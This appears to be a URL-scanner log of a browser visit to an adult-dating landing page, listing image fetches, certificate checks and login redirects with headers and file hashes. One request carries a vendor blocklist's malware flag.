Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gpMBl6mwHvLMM744OnB6olg7sGyGg6ojG%2BG2mQdz32XY6D%2F8iJJIDtcdMV8r0V%2FmYItQxQbpB4BRC2nShkfB7xTAUpmJ1SnTL4RZ39apPMkVU2VusRxxtv3EveTBF0YenBA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d01ac84b4f7-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   64758
Md5:    c397f9f4382193fd4d45c600b6008e49
Sha1:   3689e9db6a13d3ad4819d7f229ecda756cbee61a
Sha256: 82357ef1702df45958ed401f7b0c4b83f89d2fda13a7433a67fd0bd7327696d7
                                        
                                            GET /ol/all/de/ms/25-687828/images/22.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 61392
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:30 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9k2GnTmo6t%2F2dH7RuQKX355Yuhk86gAIeLDIVC07gx8lZQfnmndch9UCQAg75RkWCtjGelnRPbz6YVuTcowNa%2BMUjArhlDhrAN6utYMXyTzbaas53%2BohpOnXFDLeqtOrbjI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d027f470afe-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   61392
Md5:    9502e70fcfd8acca4d0510286eba3bd8
Sha1:   1a4243f43e7212489c8ac5ecd57e74fefed98d96
Sha256: 3dc39eeeb917cdc0e57b6241c4df77b4d9103b0f2dc69771d7a659f0b35912ba
                                        
                                            GET /ol/all/de/ms/25-687828/images/23.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 61988
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:29 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o1yWAOCGpAwPCEJyOzggmnhwm93xXEiXxRfs4wD%2BNlgnVZIdrNNLQsCoHWfXpYkX%2FYYhA9fzK5F1aZm%2Fa8A%2BF29CSD8F9dDzsm93%2BAOE6lsmxC1BIuhgJJSUNlcNIzZwtSc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d028808b4fd-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   61988
Md5:    da384da949049318f5e2666fdd5944e8
Sha1:   666ac1ed92f2134d2ed7f15a6361306f1b21b146
Sha256: 417d52172fecfb675aafb6dd55a7a6c0fb166d2045ecb7a6c0447673b837a7f7
                                        
                                            GET /ol/all/de/ms/25-687828/images/35.png HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 65676
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:31 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sQ%2F23LDUwwZ72XLuInR3F9jB8QFgdBa52no1vm654y%2FFyJmjfh4Uh6ajIqLSQZHhT%2B0WS6BN6J2XFt3jmLZz5nxLEUVF73Run9PIy7kKZ45i5nxuaUlz5mWM%2FG7UW6GQoA0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d02ab98b524-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 175 x 175, 8-bit/color RGBA, non-interlaced\012- data
Size:   65676
Md5:    fd680f2add1ba478d3138793153a8a15
Sha1:   3a0f15277750d45fc7ec66ac0fa7fece5933b688
Sha256: 50bbc3f2dbf0158911cad9742eea7d0c54a8eef64febcec25881f955a244c7e7
                                        
                                            GET /ol/all/de/ms/25-687828/images/fremdgehen69_com.png?506693 HTTP/1.1 
Host: hottime4you.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hottime4you.com/ol/all/de/ms/25-687828/?cep=ap_4zjg83x1jmxbe-wjmfn6op51iqp4wiqwt5vf_6pyzzceb1vs0m7eky3zdpnsggi35kccdo1gg0mi4lfyrbwi1ezknvgkfazzmgp-snrtyki9g11kwubpf-s3jkejfb7avnmigkzhhlswm2mwgwvut0zraejlr9gas13eeidtwscbye7idxkyeim3dquacsmt0hey-ndoyotyghucm7p68aeobwyz7vyqrylhx3vxshi4wakhcb-phrv41daho7sewgzoeblne--mfkb8ikcynekgpps7ojjwpv_0fpbyxvzst-uju6mh-7ekeclhb1oatfsrjcvdv2leicdr49zedpgz6fqoreisjb9-lywrrbujnqzlthfsf6tvsmv2i&lptoken=163c623d410929773696

                                         
                                         104.21.61.179
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Content-Length: 1240
Connection: keep-alive
Last-Modified: Wed, 05 May 2021 13:28:32 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A%2FcOSdnsUbR0Ff7cjocXLDlSpchQPBK2QPyfK3h3nHXwjL3ERY52GtzOULFnRCva%2FZ0voNq5gMf2pQKD9ThXKEjUSPCKPeXMPUFzgqzeAnib88agCbLPFq4jmHvukGsfLNU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 754c4d03998bb4fd-OSL
alt-svc: h2=":443"; ma=60


--- Additional Info ---
Magic:  PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced\012- data
Size:   1240
Md5:    42b5a1de339f60bc62983337edc85f0a
Sha1:   10c3cb6655538193f1988123e9fd5f9fda7915fe
Sha256: 0387e0d953b13b879873233510f927697c7a598c82f22b3edf19a5c8d21469cf

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0=w100 HTTP/1.1 
Host: lh3.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         142.250.74.142
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
location: https://accounts.google.com/ServiceLogin?continue=https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en
cache-control: private
vary: Origin
access-control-allow-origin: *
timing-allow-origin: *
x-content-type-options: nosniff
date: Tue, 04 Oct 2022 07:45:55 GMT
server: fife
content-length: 337
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with CRLF, LF line terminators
Size:   337
Md5:    66a43eafe19fd2e9782007272dd06ced
Sha1:   9d5112f8b4482ef224d10b0d0a17bfaf053e8e23
Sha256: f432da756645f1aa0bdfff17c86556d7343c5ae482f941597552d9701560d6bb
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 04 Oct 2022 07:45:55 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ServiceLogin?continue=https://lh3.google.com/u/0/d/1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en HTTP/1.1 
Host: accounts.google.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         216.58.207.237
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
                                        
x-frame-options: DENY
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Tue, 04 Oct 2022 07:45:55 GMT
location: https://accounts.google.com/v3/signin/identifier?dsh=S1728465341%3A1664869555910079&continue=https%3A%2F%2Flh3.google.com%2Fu%2F0%2Fd%2F1l0frEmdXyaOzgdSdyzEFLxHRz8nZsme1xNv0ZMbsDI0%3Dw100&hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin&ifkv=AQDHYWo4lWoJZtUxa6xluLoa-HBEwbqzVuiyH4jecC_Tbm9IR9DEKuHonBBjrkQHeOwhu4ogvQgp-w
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-opener-policy-report-only: same-origin; report-to="coop_gse_qebhlk"
content-security-policy: script-src 'nonce-oaHFazzJ6Cge39-U29_MsA' 'unsafe-inline' 'unsafe-eval';object-src 'none';base-uri 'self';report-uri /cspreport, require-trusted-types-for 'script';report-uri /cspreport
report-to: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
content-encoding: gzip
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
content-length: 411
server: GSE
set-cookie: __Host-GAPS=1:bEsgXtWwqNXRvFAewcG38pFgA-RDtg:r7pShI-i01_7Sbk8;Path=/;Expires=Thu, 03-Oct-2024 07:45:55 GMT;Secure;HttpOnly;Priority=HIGH
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document, ASCII text, with very long lines (386)
Size:   411
Md5:    54f41954005c1195d59a0b4e3842faaf
Sha1:   30b867ef5dd8d4de8a10c51382809c102b3b77fd
Sha256: e71265236951baaadaa58c274280a4fb4fdf47555ae31701748c0393486c9fe1
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2858
Expires: Tue, 04 Oct 2022 08:33:34 GMT
Date: Tue, 04 Oct 2022 07:45:56 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2858
Expires: Tue, 04 Oct 2022 08:33:34 GMT
Date: Tue, 04 Oct 2022 07:45:56 GMT
Connection: keep-alive

                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.77.32
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "E8E5212B8D90257F23BDB0D1D643B5E7D7528D964056C3A4A269B5E09F409F2D"
Last-Modified: Sun, 02 Oct 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=2858
Expires: Tue, 04 Oct 2022 08:33:34 GMT
Date: Tue, 04 Oct 2022 07:45:56 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F545190f2-96f3-40f8-bd46-cebe7171aee7.webp HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9917
x-amzn-requestid: 2dff93d9-795d-4885-9b82-610b0d235a82
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTGEnIAMF1zg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-117afa703663ada75627792c;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: p5nOqBojKO6S-c_DxIu8B3p-NK0pzRHkz0DOPeyv7PQt9h0x1jdtoQ==
via: 1.1 da5952aa802df39905ceb16592e9698a.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:54 GMT
age: 35402
etag: "22aab05208a01ae5def4d63dc145085630f57bcb"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9917
Md5:    d8c08f8066cc732de8befd6ccd629a95
Sha1:   22aab05208a01ae5def4d63dc145085630f57bcb
Sha256: f8a560a0563518d992d0bd2655d2b5c406435a18e874ca00b51374d2ff901770
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F840ae91d-bdbe-4236-ad14-27b04e390b6a.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 2761
x-amzn-requestid: 00090151-da40-48e8-98f0-a0c579fe6d1c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpI_EgdIAMFc0A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b556c-06ceb1750213c44130848bf2;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:34:36 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: -VI34uA9q6D2_lYs0LtkmZOKZrBKQsYX9plMuw8zwnCt_3b2ZZ1Uxg==
via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 ebe4011a81a36e2bf678f69ce1711330.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:46 GMT
age: 35410
etag: "0f0c8f45a22563c3c87ab7ec6279fabc96cdfb1f"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   2761
Md5:    fb7d0bdcd7cf60e39ee64d92f5694384
Sha1:   0f0c8f45a22563c3c87ab7ec6279fabc96cdfb1f
Sha256: a6dd1fade6b47e539dd42ed07d2cf58179db10fe946809f201889a1f9c4ef282
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F92f8209d-8dc3-45f5-bfb8-151edb23e30c.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 4996
x-amzn-requestid: 2f13b6ea-4426-4b3f-81be-5d8ca0278ce7
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcrokFkroAMF0XA=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5969-421b4993676a68df2b43ad65;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:51:37 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 0s9K75q7TzjbFBJ3vviHLcItPRb6CP2URJRYs2k9JmppyWHKvzv5hg==
via: 1.1 f13aef0c4b52f6f681401f232d03eb68.cloudfront.net (CloudFront), 1.1 567b44ed19c8caed2570b7bcd8c70034.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 22:10:59 GMT
age: 34497
etag: "16f2fe758de4ebf7d654cb9669c73f030eb1fdef"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   4996
Md5:    126f1f4538e5e4228a4f36d3b02e9d62
Sha1:   16f2fe758de4ebf7d654cb9669c73f030eb1fdef
Sha256: 594210beaabbc35a37d5d648836277f950e46b2d4c2eab2abde2d33beafdff37
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F481896f6-cdf2-442f-aea2-dfa2c7c45f77.png HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8738
x-amzn-requestid: ede4db78-f2ab-4226-a855-dc7373978dfb
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcpvTFrBoAMFR3w=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5661-2776543e774f0016329ddade;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:38:41 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: c9bu34_KooZB6Z4d8xXGnsd9jZ7lPl3yIo9II1Dm_2YVId3l9-7n-w==
via: 1.1 00f0a41f749793b9dd653153037c957e.cloudfront.net (CloudFront), 1.1 1508efc4152aa1778ed4adecb328b374.cloudfront.net (CloudFront), 1.1 google
date: Mon, 03 Oct 2022 21:55:46 GMT
age: 35410
etag: "d830b94bea3b5698e5192a7ea05f90b25b2f9cc9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8738
Md5:    d5745f8e3528f481ae2acf05b4abd3d0
Sha1:   d830b94bea3b5698e5192a7ea05f90b25b2f9cc9
Sha256: 313e11915f0869a608c830637b9dfd236ff28a8fb3354c3cc8748816b0ee18b0
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff4f5077e-59b1-4f52-bd32-a57c373ce2f1.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8308
x-amzn-requestid: 35cc0acc-ac90-4f36-a976-c61c34cfe4fe
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: ZcqNXG3mIAMFujg=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-633b5722-112061742493dd5255c3fb00;Sampled=0
x-amzn-remapped-date: Mon, 03 Oct 2022 21:41:54 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: VeeA3FQIKbAt5xmPr99k9gQjGbbwrRLM1lFYWaVIO3TCVM19GUKJaA==
